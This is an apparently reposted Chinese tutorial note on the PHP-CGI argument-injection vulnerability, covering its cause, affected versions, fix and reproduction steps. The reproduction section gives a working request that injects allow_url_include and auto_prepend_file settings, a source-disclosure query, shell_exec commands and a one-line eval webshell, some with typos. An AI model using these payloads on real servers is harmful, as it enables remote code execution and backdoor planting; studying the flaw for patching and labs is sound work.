IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> PHP CGI漏洞 -> 正文阅读

[PHP知识库]PHP CGI漏洞

一、漏洞原理:

HTTP请求的参数直接传递给Apache服务器,服务器识别不出便向前解析,导致“不合法”参数被执行。具有源码泄露、敏感信息泄露、后门植入、任意代码执行等危害。

二、影响版本:< PHP 5.3.12 或 < PHP 5.4.2

三、修复方法:升级PHP版本、过滤请求参数

四、命令执行:

-b???????? 启动fastcgi进程

-c???????? 查看php.ini文件位置

-d???????? 指定配置项

-s???????? 显示文件源码

-n???????? 不要加载php.ini文件

-T???????? 执行指定次该文件

-h或-? 显示帮助

······

四、复现步骤

1.查看PHP版本

2.构造payload

修改请求:

POST /Index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3a//input HTTP/1.1

GET /Index.php?-s

...

输入代码:

<?php echo shell_exec("ls");?> ?? ?获取当前生成的文件
<?php echo shell_exec("id");?>?? ?获取当前linux用户权限
<?php echo_shell_exrc("pwd");?>?? ?获取当前路径
<?php @eval($_POST['chooper']);>?? ?一句话木马
<?php phpinfo()'?>? ? ? ? 服务器配置信息

...

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-28 11:40:17  更:2022-01-28 11:41:49 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:41:45-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码